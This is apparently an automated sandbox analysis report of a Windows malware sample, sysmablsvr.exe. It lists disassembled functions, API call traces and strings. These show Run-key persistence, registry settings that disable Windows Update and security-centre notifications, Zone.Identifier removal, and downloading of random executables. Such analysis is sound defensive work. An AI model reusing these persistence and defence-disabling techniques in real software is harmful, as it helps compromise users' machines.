                                              control_flow_graph 338 40dca0-40dcc7 socket 339 40de01-40de05 338->339 340 40dccd-40dd95 htons inet_addr setsockopt call 40b010 bind lstrlenA sendto ioctlsocket 338->340 341 40de07-40de0d 339->341 342 40de0f-40de15 339->342 345 40dd9b-40dda2 340->345 341->342 346 40dda4-40ddb3 call 40de20 345->346 347 40ddf5-40ddf9 call 40b0d0 345->347 351 40ddb8-40ddc0 346->351 350 40ddfe 347->350 350->339 352 40ddc2 351->352 353 40ddc4-40ddf3 call 40a570 351->353 352->347 353->345
                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              Function 0040D280 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              Function 0040B010 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              Function 0040C410 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(00407FCF,00000000,00000000,00000001,F0000040,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C423
                                              • CryptGenRandom.ADVAPI32(00407FCF,?,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C439
                                              • CryptReleaseContext.ADVAPI32(00407FCF,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C445
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction ID: 6943664ffc8d3a105bd4ceed40135057dfa4a41f6174007770034458561b6d1a
                                              • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction Fuzzy Hash: 0BE01275650208BBDB24CFD5EC49FDA776CEB48700F104154F70997190DAB5EA4097A9
                                              Function 00407500 Relevance: 293.0, APIs: 108, Strings: 59, Instructions: 784sleepfilesynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ecc0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 11 4075f0-4075f2 ExitProcess 3->11 12 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->12 6 407902-407922 RegOpenKeyExW 4->6 7 4078d6-4078fc RegSetValueExA RegCloseKey 4->7 9 407950-407970 RegOpenKeyExW 6->9 10 407924-40794a RegSetValueExA RegCloseKey 6->10 7->6 13 407972-407998 RegSetValueExA RegCloseKey 9->13 14 40799e-4079be RegOpenKeyExW 9->14 10->9 15 40764c-40767b SetFileAttributesW RegOpenKeyExW 12->15 16 4076de-407720 Sleep wsprintfW CopyFileW 12->16 13->14 17 4079c0-4079e6 RegSetValueExA RegCloseKey 14->17 18 4079ec-407a0c RegOpenKeyExW 14->18 15->16 21 40767d-4076b0 wcslen RegSetValueExW 15->21 22 407726-407755 SetFileAttributesW RegOpenKeyExW 16->22 23 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 16->23 17->18 19 407a0e-407a3a RegSetValueExA RegCloseKey 18->19 20 407a3f-407a5f RegOpenKeyExW 18->20 24 407ae4-407b04 RegOpenKeyExW 19->24 26 407a61-407a90 RegCreateKeyExW RegCloseKey 20->26 27 407a96-407ab6 RegOpenKeyExW 20->27 21->16 28 4076b2-4076d4 RegCloseKey call 40ef10 21->28 22->23 29 407757-40778a wcslen RegSetValueExW 22->29 23->4 25 407817-407846 SetFileAttributesW RegOpenKeyExW 23->25 32 407b06-407b32 RegSetValueExA RegCloseKey 24->32 33 407b37-407b57 RegOpenKeyExW 24->33 25->4 30 407848-40787b wcslen RegSetValueExW 25->30 26->27 27->24 31 407ab8-407ade RegSetValueExA RegCloseKey 27->31 28->16 43 4076d6-4076d8 ExitProcess 28->43 29->23 35 40778c-4077ae RegCloseKey call 40ef10 29->35 30->4 36 40787d-40789f RegCloseKey call 40ef10 30->36 31->24 37 407c33-407c53 RegOpenKeyExW 32->37 39 407b59-407b88 RegCreateKeyExW RegCloseKey 33->39 40 407b8e-407bae RegOpenKeyExW 33->40 35->23 49 4077b0-4077b2 ExitProcess 35->49 36->4 56 4078a1-4078a3 ExitProcess 36->56 46 407c81-407ca1 RegOpenKeyExW 37->46 47 407c55-407c7b RegSetValueExA RegCloseKey 37->47 39->40 44 407bb0-407bdf RegCreateKeyExW RegCloseKey 40->44 45 407be5-407c05 RegOpenKeyExW 40->45 44->45 45->37 53 407c07-407c2d RegSetValueExA RegCloseKey 45->53 50 407ca3-407cc9 RegSetValueExA RegCloseKey 46->50 51 407ccf-407cef RegOpenKeyExA 46->51 47->46 50->51 54 407cf5-407dd5 RegSetValueExA * 7 RegCloseKey 51->54 55 407ddb-407dfb RegOpenKeyExA 51->55 53->37 54->55 57 407e01-407ee1 RegSetValueExA * 7 RegCloseKey 55->57 58 407ee7-407efc Sleep call 40cd60 55->58 57->58 61 408071-40807a 58->61 62 407f02-40805a WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40dbd0 call 406f70 CreateEventA call 40c490 call 40d6c0 call 40b850 call 40d6f0 * 4 call 40d860 58->62 86 40805f-40806e call 40d9a0 62->86 86->61
                                              APIs
                                              • Sleep.KERNEL32(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNEL32(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysmablsvr.exe,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(C:\Windows\sysmablsvr.exe), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNEL32(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysmablsvr.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-1943688019
                                              • Opcode ID: e8792de07db31feacb4225683fdc67bc03523796b4c41c4f0dd09e2c170d2514
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: e8792de07db31feacb4225683fdc67bc03523796b4c41c4f0dd09e2c170d2514
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D
                                              Function 0040F070 Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 235filesleepnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              • %temp%, xrefs: 0040F09B
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: bcfd523ca2bd59dabc98687d20756347b5c017932b083f233573b856c8686c0d
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Opcode Fuzzy Hash: bcfd523ca2bd59dabc98687d20756347b5c017932b083f233573b856c8686c0d
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28
                                              Function 0040B430 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 121 40b430-40b447 call 40b360 124 40b449 121->124 125 40b44e-40b46a call 40afb0 strcmp 121->125 127 40b6d5-40b6d8 124->127 129 40b471-40b48d call 40afb0 strstr 125->129 130 40b46c 125->130 133 40b4d0-40b4ec call 40afb0 strstr 129->133 134 40b48f-40b4ab call 40afb0 strstr 129->134 130->127 139 40b4ee-40b50a call 40afb0 strstr 133->139 140 40b52f-40b54b call 40afb0 strstr 133->140 141 40b4cb 134->141 142 40b4ad-40b4c9 call 40afb0 strstr 134->142 149 40b52a 139->149 150 40b50c-40b528 call 40afb0 strstr 139->150 151 40b54d-40b569 call 40afb0 strstr 140->151 152 40b58e-40b5a4 EnterCriticalSection 140->152 141->127 142->133 142->141 149->127 150->140 150->149 163 40b589 151->163 164 40b56b-40b587 call 40afb0 strstr 151->164 153 40b5af-40b5b8 152->153 156 40b5e9-40b5f4 call 40b6e0 153->156 157 40b5ba-40b5ca 153->157 170 40b6ca-40b6cf LeaveCriticalSection 156->170 171 40b5fa-40b608 156->171 160 40b5e7 157->160 161 40b5cc-40b5e5 call 40da30 157->161 160->153 161->156 163->127 164->152 164->163 170->127 173 40b60a 171->173 174 40b60e-40b610 call 40a320 171->174 173->174 176 40b615-40b61f 174->176 176->170 177 40b625-40b642 call 40da30 176->177 180 40b644-40b654 177->180 181 40b69a-40b6b2 177->181 182 40b660-40b698 call 40a740 180->182 183 40b656-40b65e Sleep 180->183 184 40b6b8-40b6c3 call 40b6e0 181->184 182->184 183->180 184->170 189 40b6c5 call 40b110 184->189 189->170
                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: d27b1e01b54477f86afe98856adb7ca23eb5c9f208e924790736f7c59111b262
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Opcode Fuzzy Hash: d27b1e01b54477f86afe98856adb7ca23eb5c9f208e924790736f7c59111b262
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF
                                              Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
